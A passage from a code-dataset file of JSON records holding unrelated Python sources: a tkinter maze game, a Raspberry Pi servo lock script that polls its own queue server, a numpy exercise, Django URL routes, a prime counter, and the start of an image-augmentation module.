.PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]+1][spacecraft[0]] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]+1][spacecraft[0]] == 5 or array[spacecraft[1]+1][spacecraft[0]] == 6:\n lift()\n elif array[spacecraft[1]+1][spacecraft[0]] == 3:\n win = True\n Down = False\n\n elif Right:\n if array[spacecraft[1]][spacecraft[0]+1] == 0 or array[spacecraft[1]][spacecraft[0]+1] == 7:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]][spacecraft[0]+1] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]][spacecraft[0]+1] == 5 or array[spacecraft[1]][spacecraft[0]+1] == 6:\n lift()\n elif array[spacecraft[1]][spacecraft[0]+1] == 3:\n win = True\n Right = False\n\n elif Left:\n if array[spacecraft[1]][spacecraft[0]-1] == 0 or array[spacecraft[1]][spacecraft[0]-1] == 7:\n winsound .PlaySound(\"E:\\\\SomPhors_VC1_Algorithm\\\\Sounds\\\\coin2.wav\", winsound.SND_FILENAME)\n point += 5\n array[spacecraft[1]][spacecraft[0]-1] = 2\n array[spacecraft[1]][spacecraft[0]] = 7\n elif array[spacecraft[1]][spacecraft[0]-1] == 5 or array[spacecraft[1]][spacecraft[0]-1] == 6:\n lift()\n elif array[spacecraft[1]][spacecraft[0]-1] == 3:\n win =True\n Left = False\n canvas1.delete(\"craft\")\n canvas1.delete(\"animy\")\n canvas1.delete(\"gold\")\n canvas1.delete(\"point\")\n drawgraphic()\n\n# Go Up.......................................................................................................................\ndef goUp(event):\n global Up\n Up = True\n findSpacecraft()\n\n# Go Down......................................................................................................................\ndef goDown(event):\n global Down\n Down = True\n findSpacecraft()\n\n# Go Right.....................................................................................................................\ndef goRight(event):\n global Right\n Right = True\n findSpacecraft()\n\n# Go Left......................................................................................................................\ndef goLeft(event):\n global Left\n Left =True\n findSpacecraft()\n\n# Exit from game................................................................................................................\ndef Exit(event):\n displaysound()\n canvas1.delete(\"bggraphic\")\n canvas1.delete(\"wall\")\n canvas1.delete(\"exit\")\n canvas1.delete(\"heart1\")\n canvas1.delete(\"heart2\")\n canvas1.delete(\"heart3\")\n canvas1.delete(\"craft\")\n canvas1.delete(\"animy\")\n canvas1.delete(\"gold\")\n # canvas1.delete(\"display\")\n canvas1.delete(\"over\")\n\n\n# Choose level..................................................................................................................\ndef find(event):\n global levelArray,levelnumber,bg,array,point\n displaysound()\n\n canvas1.create_image( 0, 0, image = bggraphic, anchor = \"nw\", tags=\"bggraphic\") \n canvas1.create_image( 800, 10, image = heart, anchor = \"nw\", tags=\"heart1\")\n canvas1.create_image( 850, 10, image = heart, anchor = \"nw\", tags=\"heart2\")\n canvas1.create_image( 900, 10, image = heart, anchor = \"nw\", tags=\"heart3\")\n\n level = 1\n for index in range(len(levelArray)):\n if (levelArray[index][0] <= event.x and levelArray[index][2] >= event.x) and (levelArray[index][1] <= event.y and levelArray[index][3] >= event.y):\n level = index+1\n \n file = open(\"E:\\\\SomPhors_VC1_Algorithm\\\\files\\\\\"+str(level)+\".txt\", \"r\")\n array = file.read()\n array = array.split(';')\n for i in range(len(array)):\n array[i] = array[i].strip('\\n')\n array[i] = array[i].split(',')\n for j in range(len(array[i])):\n array[i][j] = int(array[i][j])\n # print(array)\n file.close()\n \n canvas1.create_rectangle(0, 0, 70, 40, outline=\"black\", fill=\"#2C6CAC\", tags=\"exit\")\n canvas1.create_text(35, 20, text = \"Exit\", fill=\"white\", font=\"Times 14 italic bold\", tags=\"exit\")\n\n drawgraphic()\n\ndef back(event):\n global bg,startbg\n displaysound()\n canvas1.delete(\"back\")\n canvas1.delete(\"level\")\n canvas1.delete(\"image\")\n startbg()\n\n# Delete Setting................................................................................................................\ndef remove(event):\n displaysound()\n canvas1.delete(\"remove\")\n canvas1.delete(\"delete\")\n canvas1.delete(\"soundon\")\n canvas1.delete(\"soundoff\")\n canvas1.delete(\"musicon\")\n canvas1.delete(\"musicoff\")\n canvas1.delete(\"senario\")\n canvas1.move(\"welcome\", 0, 100)\n\n# Display levels................................................................................................................\ndef startNew(event):\n global bg,X,Y,levelArray\n displaysound()\n X = 180\n Y = 100\n number = 1\n levelArray = []\n canvas1.create_image( 0, 0, image = bglevel, anchor = \"nw\", tags=\"image\")\n canvas1.create_text(50, 40, text = \"<<\", fill=\"white\", font=\"Times 30 italic bold\", tags=\"back\")\n \n for n in range(3):\n for r in range(5):\n Array = []\n levelnumber.append(number)\n X1 = X+100\n Y1 = Y+100\n canvas1.create_rectangle(X, Y, X1, Y1, outline=\"black\", fill=\"white\", tags=\"level\")\n canvas1.create_text(X+50, Y+50, text = number, fill=\"orange\", font=\"Times 35 italic bold\", tags=\"level\")\n Array.append(X)\n Array.append(Y)\n Array.append(X1)\n Array.append(Y1)\n X +=130\n number += 1\n levelArray.append(Array)\n Y += 130\n X = 180 \n\n# Setting display............................................................................................................\ndef settingNew(event):\n displaysound()\n canvas1.move(\"welcome\", 0, -100)\n canvas1.create_rectangle(300, 100, 700, 500, fill=\"white\", tags=\"delete\")\n canvas1.create_text(680, 125, text = \"X\", fill=\"black\", font=\"Oswald 25 italic bold\", tags=\"remove\")\n if clicksound:\n canvas1.create_image( 330, 160, image = soundOn, anchor = \"nw\", tags=\"soundon\")\n canvas1.create_text(500, 210, text = \"Sound On\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundon\")\n else:\n canvas1.create_image( 330, 160, image = soundOff, anchor = \"nw\", tags=\"soundoff\")\n canvas1.create_text(500, 210, text = \"Sound Off\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundoff\")\n canvas1.create_image( 330, 270, image = soundOn, anchor = \"nw\", tags=\"musicon\")\n canvas1.create_text(500, 330, text = \"Music On\", fill=\"black\", font=\"Times 18 bold\", tags=\"musicon\")\n\n \n\n# Identify Sound ............................................................................................................\ndef ClickMusicOff(event):\n displaysound()\n canvas1.delete(\"musicoff\")\n canvas1.create_image( 330, 270, image = soundOn, anchor = \"nw\", tags=\"musicon\")\n canvas1.create_text(500, 330, text = \"Music On\", fill=\"black\", font=\"Times 18 bold\", tags=\"musicon\")\n\ndef ClickSoundOff(event):\n global clicksound\n clicksound = True\n canvas1.delete(\"soundoff\")\n canvas1.create_image( 330, 160, image = soundOn, anchor = \"nw\", tags=\"soundon\")\n canvas1.create_text(500, 210, text = \"Sound On\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundon\")\n\ndef ClickSoundOn(event):\n global clicksound\n displaysound()\n clicksound = False\n canvas1.delete(\"soundon\")\n canvas1.create_image( 330, 160, image = soundOff, anchor = \"nw\", tags=\"soundoff\")\n canvas1.create_text(500, 210, text = \"Sound Off\", fill=\"black\", font=\"Times 18 bold\", tags=\"soundoff\")\ndef ClickMusicOn(event):\n displaysound()\n canvas1.delete(\"musicon\")\n canvas1.create_image( 330, 270, image = soundOff, anchor = \"nw\", tags=\"musicoff\")\n canvas1.create_text(500, 330, text = \"Music Off\", fill=\"black\", font=\"Times 18 bold\", tags=\"musicoff\")\n\n# Quit diplay................................................................................................................\ndef quitNew(event):\n displaysound()\n canvas1.move(\"welcome\", 0, -100)\n canvas1.create_rectangle(300, 100, 700, 500, fill=\"white\", tags=\"delete\")\n canvas1.create_text(680, 115, text = \"X\", fill=\"black\", font=\"Oswald 25 italic bold\", tags=\"remove\")\n canvas1.create_text(350, 190, anchor=W, font=\"Purisa\",text=\"- Step1: Click start to choose levels.\", tags=\"senario\")\n canvas1.create_text(350, 220, anchor=W, font=\"Purisa\",text=\"- Step2: Spacecraft find the way go to Earth.\", tags=\"senario\")\n canvas1.create_text(410, 250, anchor=W, font=\"Purisa\",text=\"But have some animy on the way.\", tags=\"senario\")\n canvas1.create_text(350, 280, anchor=W, font=\"Purisa\",text=\"- Step3: If spacecraft meet animy it will lose 1 lift.\", tags=\"senario\")\n canvas1.create_text(410, 310, anchor=W, font=\"Purisa\",text=\"If spacecraft lose 3 lift Game over!\", tags=\"senario\")\n canvas1.create_text(410, 340, anchor=W, font=\"Purisa\",text=\"If spacecraft arrive Earth it will Win\", tags=\"senario\")\n\n#Start game.....................................................................................................................\ndef startbg():\n global bg\n\n canvas1.create_image( 0, 0, image = space, anchor = \"nw\") \n\n \n # Add Text \n canvas1.create_text(500, 150, text = \"Welcome to the maze game!!!\", fill=\"#0D4D8D\", font=\"Times 35 italic bold\", tags=\"welcome\")\n \n #Start\n canvas1.create_rectangle(430, 220, 610, 280, fill=\"white\", tags=\"start\")\n canvas1.create_text(515, 250, text = \"Start\", fill=\"black\", font=\"Times 35 italic bold\", tags=\"start\")\n\n # Setting\n canvas1.create_rectangle(430, 320, 610, 380, fill=\"white\", tags=\"setting\")\n canvas1.create_text(515,350, text = \"Setting\", fill=\"black\", font=\"Times 35 italic bold\", tags=\"setting\")\n\n # Quit\n canvas1.create_rectangle(430, 420, 610, 480, fill=\"white\", tags=\"quit\")\n canvas1.create_text(515, 450, text = \"Quit\", fill=\"black\", font=\"Times 35 italic bold\", tags=\"quit\")\n \n \n# First of game...............................................................................................................\ndef begin():\n canvas1.create_text(500, 550, text = \"Loading...\", fill=\"white\", font=\"Times 20 italic bold\", tags=\"welcome\")\n canvas1.after(2000, startbg)\n\n# ClickOn.....................................................................................................................\ncanvas1.tag_bind(\"start\", \"\", startNew)\ncanvas1.tag_bind(\"setting\", \"\", settingNew)\ncanvas1.tag_bind(\"quit\", \"\", quitNew)\ncanvas1.tag_bind(\"remove\", \"\", remove)\n\ncanvas1.tag_bind(\"back\", \"\", back)\ncanvas1.tag_bind(\"level\", \"\", find)\ncanvas1.tag_bind(\"exit\", \"\", Exit)\n\nroot.bind(\"\", goUp)\nroot.bind(\"\", goDown)\nroot.bind(\"\", goRight)\nroot.bind(\"\", goLeft)\n\ncanvas1.tag_bind(\"next\", \"\", Exit)\ncanvas1.tag_bind(\"exitlose\", \"\", Exit)\n\ncanvas1.tag_bind(\"soundon\", \"\", ClickSoundOn)\ncanvas1.tag_bind(\"musicon\", \"\", ClickMusicOn)\ncanvas1.tag_bind(\"soundoff\", \"\", ClickSoundOff)\ncanvas1.tag_bind(\"musicoff\", \"\", ClickMusicOff)\ncanvas1.tag_bind(\"over\", \"\", Exit)\n\n# Image........................................................................................................................\n\nbg = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\start.gif\") \ncanvas1.create_image( 0, 0, image = bg, anchor = \"nw\", tags=\"bg1\")\n\nspace = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\Cartoon_spaceship_dn.png\") \nbglevel = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\level.png\") \nspacecrafter1 = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\playerShip2_orange.png\") \nEarth = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\Earth.png\") \nbggraphic = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\spaces.gif\") \nheart = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\hearts.png\") \nsoundOn = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\soundOn.png\") \nsoundOff = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\soundOff.png\") \nAnimy = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\robot_walk1.png\") \n\ncoin3 = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\gold_3.png\") \n\nwall = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\stoneCenter.png\") \nover = PhotoImage(file = \"E:\\\\SomPhors_VC1_Algorithm\\\\images\\\\over.gif\") \n\n\nbegin()\n\n\n# Execute tkinter \nroot.mainloop()","sub_path":"maze_Game.py","file_name":"maze_Game.py","file_ext":"py","file_size_in_byte":17417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503074790","text":"import requests\nimport time\nimport json\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(7,GPIO.OUT)\np = GPIO.PWM(7,50)\np.start(7.5)\np.ChangeDutyCycle(0)\n\nsleepTime = 5\nwith open(\"lockname.txt\") as f:\n lockKey = f.read()\n \nwith open(\"lockstatus.txt\") as f:\n lockStatus = f.read()\n \nprint(lockKey)\nprint(lockStatus)\nOPEN = False\nTEST = False\nINITIALISE = False\nlockname = \"\"\n\nif lockStatus != \"init\":\n print(\"lock opening\")\n p.ChangeDutyCycle(12.5)\n time.sleep(0.5)\n p.ChangeDutyCycle(0)\nelse:\n print(\"lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(0.5)\n p.ChangeDutyCycle(0)\n\n\nwhile True:\n try:\n with open(\"lockname.txt\") as g:\n lockKey = g.read()\n \n with open(\"lockstatus.txt\") as g:\n lockStatus = g.read()\n \n if lockStatus == \"init\":\n while OPEN!= True:\n\n\n r =requests.get(url =\"http://pygmalion.redbrick.dcu.ie:7726/queue/\", params = \"\")\n\n cont = str(r.content)[2:-1]\n print(cont)\n if cont!=\"queue is empty\":\n cont = cont.replace(\"\\'\", \"\\\"\")\n jsonload = json.loads(cont)\n if lockKey in jsonload:\n if jsonload[lockKey] == \"open\":\n OPEN = True\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n\n r = requests.post(url =\"http://pygmalion.redbrick.dcu.ie:7726/delqueue/\", json ={lockKey:\"del\"})\n print(\"Lock opening\")\n p.ChangeDutyCycle(12.5)\n time.sleep(5)\n print(\"lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(0.5)\n OPEN = False\n p.ChangeDutyCycle(0)\n \n else:\n while TEST == False and INITIALISE == False:\n\n\n r =requests.get(url =\"http://pygmalion.redbrick.dcu.ie:7726/initqueue/\", params = \"\")\n\n cont = str(r.content)[2:-1]\n print(cont)\n if cont!=\"queue is empty\":\n cont = cont.replace(\"\\'\", \"\\\"\")\n jsonload = json.loads(cont)\n \n if lockKey in jsonload:\n if jsonload[lockKey] == \"test\":\n TEST = True\n elif jsonload[lockKey] == \"init\":\n INITIALISE = True\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n else:\n print(\"sleeping\")\n time.sleep(sleepTime)\n \n if TEST == True:\n r = requests.post(url =\"http://pygmalion.redbrick.dcu.ie:7726/delinitqueue/\", json ={lockKey:\"del\"})\n print(\"Lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(5)\n print(\"lock opening\")\n p.ChangeDutyCycle(12.5)\n time.sleep(0.5)\n TEST = False\n p.ChangeDutyCycle(0)\n \n elif INITIALISE == True:\n r = requests.post(url =\"http://pygmalion.redbrick.dcu.ie:7726/delinitqueue/\", json ={lockKey:\"del\"})\n f = open(\"lockstatus.txt\", \"w\")\n f.write(\"init\")\n f.close()\n print(\"Lock closing\")\n p.ChangeDutyCycle(2.5)\n time.sleep(0.5)\n p.ChangeDutyCycle(0)\n \n except KeyboardInterrupt:\n p.stop()\n GPIO.cleanup()\n\n\n\n\n\n","sub_path":"code/RPi/lockCheck.py","file_name":"lockCheck.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"610846379","text":"import numpy as np\r\nn=4\r\np=3\r\nmy_array1 = np.zeros(shape=(n, p))\r\nfor (i, j), x in np.ndenumerate(my_array1):\r\n print(i, j, x, sep=';')\r\n m=input(f'введите значение: [{i},{j}]: ')\r\n my_array1[i, j]=float(m)\r\nprint(my_array1)\r\nmy_array2 = np.zeros(shape=(n, p))\r\nfor (i, j), x in np.ndenumerate(my_array2):\r\n print(i, j, x, sep=';')\r\n m=input(f'введите значение: [{i},{j}]: ')\r\n my_array2[i, j]=float(m)\r\nprint(my_array2)\r\nmy_array3 = np.zeros(shape=(n, p))\r\nfor (i, j), x in np.ndenumerate(my_array3):\r\n if my_array1[i, j]>my_array2[i, j]:\r\n my_array3[i, j]=my_array1[i, j]\r\n else:\r\n my_array3[i, j]=my_array2[i, j]\r\nprint('наибольшие значения массивов', my_array3)","sub_path":"Lab3_dop_ex1.py","file_name":"Lab3_dop_ex1.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283558277","text":"from django.conf.urls import url\n\nfrom .views.views_indicators import (\n indicator_create,\n CollectedDataCreate,\n CollectedDataUpdate,\n CollectedDataDelete,\n IndicatorCreate,\n IndicatorDelete,\n IndicatorUpdate,\n IndicatorExport,\n IndicatorReportData,\n CollectedDataReportData,\n collecteddata_import,\n service_json,\n PeriodicTargetView,\n PeriodicTargetDeleteView,\n collected_data_view,\n program_indicators_json,\n programIndicatorReport,\n indicator_report,\n IndicatorReport,\n IndicatorDataExport,\n TVAReport,\n DisaggregationReport,\n TVAPrint,\n DisaggregationPrint,\n api_indicator_view)\n\nfrom .views.views_reports import (\n IPTTReportQuickstartView,\n IPTT_ReportView,\n IPTT_ReportIndicatorsWithVariedStartDate,\n IPTT_ExcelExport,\n create_pinned_report,\n delete_pinned_report,\n IPTT_ExcelExport,\n IPTT_CSVExport\n)\n\n\nurlpatterns = [\n url(r'^indicator_create/(?P\\d+)/$', indicator_create, name='indicator_create'),\n\n url(r'^indicator_add/(?P\\d+)/$', IndicatorCreate.as_view(), name='indicator_add'),\n\n url(r'^indicator_update/(?P\\d+)/$', IndicatorUpdate.as_view(), name='indicator_update'),\n\n url(r'^indicator_delete/(?P\\d+)/$', IndicatorDelete.as_view(), name='indicator_delete'),\n\n url(r'^periodic_target_delete/(?P\\d+)/$', PeriodicTargetDeleteView.as_view(), name='pt_delete'),\n\n url(r'^periodic_target_generate/(?P\\d+)/$', PeriodicTargetView.as_view(), name='pt_generate'),\n\n url(r'^periodic_target_deleteall/(?P\\d+)/(?P\\w+)/$',\n PeriodicTargetView.as_view(), name='pt_deleteall'),\n\n url(r'^collecteddata_add/(?P\\d+)/(?P\\d+)/$',\n CollectedDataCreate.as_view(), name='collecteddata_add'),\n\n url(r'^collecteddata_import/$', collecteddata_import, name='collecteddata_import'),\n\n url(r'^collecteddata_update/(?P\\d+)/$', CollectedDataUpdate.as_view(), name='collecteddata_update'),\n\n url(r'^collecteddata_delete/(?P\\d+)/$', CollectedDataDelete.as_view(), name='collecteddata_delete'),\n\n url(r'^report/(?P\\d+)/(?P\\d+)/(?P\\d+)/$', indicator_report, name='indicator_report'),\n\n url(r'^tvareport/$', TVAReport.as_view(), name='tvareport'),\n\n url(r'^tvaprint/(?P\\d+)/$', TVAPrint.as_view(), name='tvaprint'),\n\n url(r'^disrep/(?P\\d+)/$', DisaggregationReport.as_view(), name='disrep'),\n\n url(r'^disrepprint/(?P\\d+)/$', DisaggregationPrint.as_view(), name='disrepprint'),\n\n url(r'^report_table/(?P\\d+)/(?P\\d+)/(?P\\d+)/$',\n IndicatorReport.as_view(), name='indicator_table'),\n\n url(r'^program_report/(?P\\d+)/$', programIndicatorReport, name='programIndicatorReport'),\n\n\n url(r'^export/(?P\\d+)/(?P\\d+)/(?P\\d+)/$',\n IndicatorExport.as_view(), name='indicator_export'),\n\n url(r'^service/(?P[-\\w]+)/service_json/', service_json, name='service_json'),\n\n url(r'^collected_data_table/(?P\\d+)/(?P\\d+)/',\n collected_data_view, name='collected_data_view'),\n\n url(r'^program_indicators/(?P\\d+)/(?P\\d+)/'\n r'(?P\\d+)', program_indicators_json, name='program_indicators_json'),\n\n url(r'^report_data/(?P\\w+)/(?P\\d+)/(?P\\d+)/$',\n IndicatorReportData.as_view(), name='indicator_report_data'),\n\n url(r'^report_data/(?P\\w+)/(?P\\d+)/(?P\\d+)/'\n r'export/$',\n IndicatorExport.as_view(),\n name='indicator_export'),\n\n url(r'^collecteddata_report_data/(?P\\d+)/(?P\\d+)/'\n r'(?P\\d+)/$',\n CollectedDataReportData.as_view(),\n name='collecteddata_report_data'),\n\n url(r'^collecteddata_report_data/(?P\\d+)/(?P\\d+)/'\n r'(?P\\d+)/export/$',\n IndicatorDataExport.as_view(),\n name='collecteddata_report_data_export'),\n\n url(r'^iptt_quickstart/', IPTTReportQuickstartView.as_view(), name='iptt_quickstart'),\n\n url(r'^iptt_report/(?P\\d+)/(?P\\w+)/$', IPTT_ReportView.as_view(), name='iptt_report'),\n\n url(r'^iptt_redirect/(?P\\d+)/$', IPTT_ReportIndicatorsWithVariedStartDate.as_view(),\n name='iptt_redirect'),\n\n url(r'^iptt_excel/(?P\\d+)/(?P\\w+)/$', IPTT_ExcelExport.as_view(), name='iptt_excel'),\n\n url(r'^pinned_report/$', create_pinned_report, name='create_pinned_report'),\n url(r'^pinned_report/delete/$', delete_pinned_report, name='delete_pinned_report'),\n\n url(r'^iptt_csv/(?P\\d+)/(?P\\w+)/$', IPTT_CSVExport.as_view(), name='iptt_csv'),\n\n # API call for program page\n url(r'^api/indicator/(?P\\d+)', api_indicator_view, name='api_indicator_view'),\n]\n","sub_path":"indicators/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157447322","text":"import time\r\n\r\n\r\n# # def create_list(r1, r2):\r\n# # \"\"\"Create list of prime numbers between r1 and r2.\"\"\"\r\n\r\n# # # Testing if range r1 and r2 are equal\r\n# # if r1 == r2:\r\n# # return r1\r\n# # else:\r\n# # # Create empty lists\r\n# # res = [] # reserve\r\n# # poss = [] # possible primes\r\n# # mult = [] # multiples of primes\r\n\r\n# # # Loop to append successors to list until r2 is reached.\r\n# # while r1 < r2 + 1:\r\n# # res.append(r1)\r\n# # r1 += 1\r\n\r\n# # # Extract all multiples of 6 from reserve list\r\n# # multiples_6 = [n for n in res if n % 6 == 0]\r\n\r\n# # # Create list with + 1 and - 1 values from each multiple of 6\r\n# # # because these are the only numbers that can be prime\r\n# # for val in multiples_6:\r\n# # poss.append(val - 1)\r\n# # poss.append(val + 1)\r\n\r\n# # # Create list of multiples with all possible combinations of elements\r\n# # # in the possible list, unless that value exceeds r2\r\n# # start = 0\r\n\r\n# # for i in range(len(poss)):\r\n# # for y in range(i, len(poss)):\r\n# # val = poss[i] * poss[y]\r\n# # upper_limit = r2\r\n# # if val <= upper_limit and val not in mult:\r\n# # mult.append(val)\r\n# # elif val >= upper_limit:\r\n# # break\r\n# # if val >= upper_limit * 2:\r\n# # break\r\n\r\n# # # Subtract the amount of multiples from the amount of possible primes,\r\n# # # add 2 (for 2 and 3), and this is the amount of primes up to upper_limit\r\n# # return len(poss) - len(mult) + 2\r\n\r\n\r\n# # def main():\r\n# # exit = \"N\"\r\n\r\n# # while exit.upper() != \"Y\":\r\n\r\n# # # Driver Code\r\n# # r1, r2 = 2, int(input(\"Enter an integer: \")),\r\n# # start = time.time()\r\n\r\n# # print(create_list(r1, r2))\r\n\r\n# # end = time.time()\r\n# # print('Time ', end - start)\r\n\r\n# # exit = input(\"Would you like to exit? (Y/N)\")\r\n\r\n\r\n# # if __name__ == \"__main__\":\r\n# # main()\r\n\r\n\r\ndef create_and_count(n):\r\n # Create list of all multiples of 6 up to n\r\n multiples_6 = [x for x in range(2, n+1) if x % 6 == 0]\r\n \r\n # Create list of all numbers 1 more or 1 less than a multiple of 6 (possible primes)\r\n poss = [val + delta for val in multiples_6 for delta in (-1, 1) if val + delta <= n]\r\n \r\n # Create list of all products of possible primes (multiples)\r\n mult = [i * j for i_index, i in enumerate(poss) for j in poss[i_index:] if i * j <= n]\r\n \r\n # Number of primes is difference of possible primes and multiples, plus 2 (for 2 and 3)\r\n return len(poss) - len(set(mult)) + 2\r\n\r\n\r\ndef main():\r\n exit = \"N\"\r\n\r\n while exit.upper() != \"Y\":\r\n\r\n n = int(input(\"Enter an integer: \"))\r\n start = time.time()\r\n\r\n print(create_and_count(n))\r\n # print(create_and_count(100)) # Should print 25\r\n # print(create_and_count(1000)) # Should print 168\r\n # print(create_and_count(10000)) # Should print 1229\r\n # print(create_and_count(100000)) # Should print 9592\r\n\r\n end = time.time()\r\n print('Time ', end - start)\r\n\r\n exit = input(\"Would you like to exit? (Y/N)\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Primes/pCount.py","file_name":"pCount.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164362337","text":"import argparse\nimport ast\nimport itertools\nimport os\n\nimport cv2\nimport numpy as np\nfrom scipy import ndimage\nimport random\n\nimport imgaug as ia\nfrom imgaug import augmenters as iaa\n\n\ndef _list_to_str(lst):\n \"\"\"Convert a list to string.\n\n Elements are separated by comma, without any spaces inserted in between\n \"\"\"\n\n if type(lst) is not list:\n return str(lst)\n\n return '[' + ','.join(_list_to_str(elem) for elem in lst) + ']'\n\ndef rotate_point(x, y, angle):\n t = -np.radians(angle) # radian\n nx = int(x * np.cos(t) - y * np.sin(t))\n ny = int(x * np.sin(t) + y * np.cos(t))\n return (nx, ny)\n\n\ndef flip_bbox_horizontal(img_w, img_h, angle):\n def f(bbox, modified_image, arg):\n tmp = bbox[0]\n bbox[0] = img_w - bbox[2]\n bbox[2] = img_w - tmp\n return bbox\n\n return f\n\n\ndef flip_bbox_vertical(img_w, img_h, angle):\n def f(bbox, modified_image, arg):\n tmp = bbox[1]\n bbox[1] = img_h - bbox[3]\n bbox[3] = img_h - tmp\n return bbox\n\n return f\n\n\ndef rotate_bbox_angle(img_w, img_h, angle):\n def f(bbox, modified_image, arg):\n x_pos, y_pos = [], []\n for x, y in itertools.product([bbox[0], bbox[2]], [bbox[1], bbox[3]]):\n nx, ny = rotate_point(x - img_w / 2, y - img_h / 2, angle)\n nx += modified_image.shape[1] // 2\n ny += modified_image.shape[0] // 2\n x_pos.append(nx)\n y_pos.append(ny)\n\n bbox[0] = min(x_pos)\n bbox[2] = max(x_pos)\n bbox[1] = min(y_pos)\n bbox[3] = max(y_pos)\n return bbox\n\n return f\n\n\ndef flip_polygon_horizontal(img_w, img_h, angle):\n def f(polygon, modified_image, arg):\n for i in range(0, len(polygon), 2):\n polygon[i] = img_w - polygon[i]\n return polygon\n\n return f\n\n\ndef flip_polygon_vertical(img_w, img_h, angle):\n def f(polygon, modified_image, arg):\n for i in range(1, len(polygon), 2):\n polygon[i] = img_h - polygon[i]\n return polygon\n\n return f\n\n\ndef rotate_polygon_angle(img_w, img_h, angle):\n def f(polygon, modified_image, arg):\n for i in range(0, len(polygon), 2):\n x, y = polygon[i], polygon[i + 1]\n nx, ny = rotate_point(x - img_w / 2, y - img_h / 2, angle)\n nx += modified_image.shape[1] // 2\n ny += modified_image.shape[0] // 2\n polygon[i], polygon[i + 1] = nx, ny\n return polygon\n\n return f\n\ndef make_random_sequential():\n seq = iaa.Sequential([\n iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\n rotate=(-45, 45),\n shear=(-16, 16),\n order=[0, 1],\n cval=(0, 255),\n mode=ia.ALL\n )\n ])\n seq_det = seq._to_deterministic()\n return seq_det\n\ndef make_noise_sequential():\n seqw = iaa.Sequential([\n\n ])\n\n\ndef random_bbox_transform(img_w, img_h, angle):\n def f(bbox, modified_image, seq_det):\n\n bbox_on_image = ia.BoundingBoxesOnImage.from_xyxy_array(np.float32([bbox]), shape=(img_h, img_w))\n\n bbox_on_image = seq_det.augment_bounding_boxes([bbox_on_image])[0]\n\n bbox = bbox_on_image.to_xyxy_array()[0].astype(np.int32).tolist()\n\n bbox[0] = max(0, min(img_w, bbox[0]))\n bbox[1] = max(0, min(img_h, bbox[1]))\n bbox[2] = max(0, min(img_w, bbox[2]))\n bbox[3] = max(0, min(img_h, bbox[3]))\n print(bbox)\n\n return bbox\n return f\n\n\ndef random_polygon_transform(img_w, img_h, angle):\n def f(polygon, modified_image, seq_det):\n\n poly = []\n for i in range(0, len(polygon), 2):\n poly.append( (polygon[i], polygon[i+1]) )\n \"\"\"\n poly_x.append(polygon[i])\n poly_y.append(polygon[i + 1])\n \"\"\"\n # rewrite for imgarg 0.2.8\n poly_on_image = ia.PolygonsOnImage([ia.Polygon(poly)], shape=(img_h, img_w))\n poly_on_image = seq_det.augment_polygons([poly_on_image])[0]\n\n moved_poly = poly_on_image.polygons[0]\n for i, (x, y) in enumerate(zip(moved_poly.xx, moved_poly.yy)):\n polygon[2 * i] = x\n polygon[2 * i + 1] = y\n\n return polygon\n return f\n\n\ndef rotate_image(angle, image):\n if angle == 0:\n return image\n elif angle == 180:\n return cv2.flip(image, -1)\n\n h, w, _ = image.shape\n t = np.radians(angle)\n h_ = abs(h * np.cos(t)) + abs(w * np.sin(t)) # rotate image size\n w_ = abs(w * np.cos(t)) + abs(h * np.sin(t))\n\n image_top = image[:1, :, :]\n image_top = cv2.resize(image_top, (w, w))\n image_bottom = image[h - 1:, :, :]\n image_bottom = cv2.resize(image_bottom, (w, w))\n image_center = cv2.vconcat([image_top, image, image_bottom])\n\n blank_shape = (w, h, 3)\n blank = np.zeros(blank_shape, dtype=np.uint8)\n\n image_left = 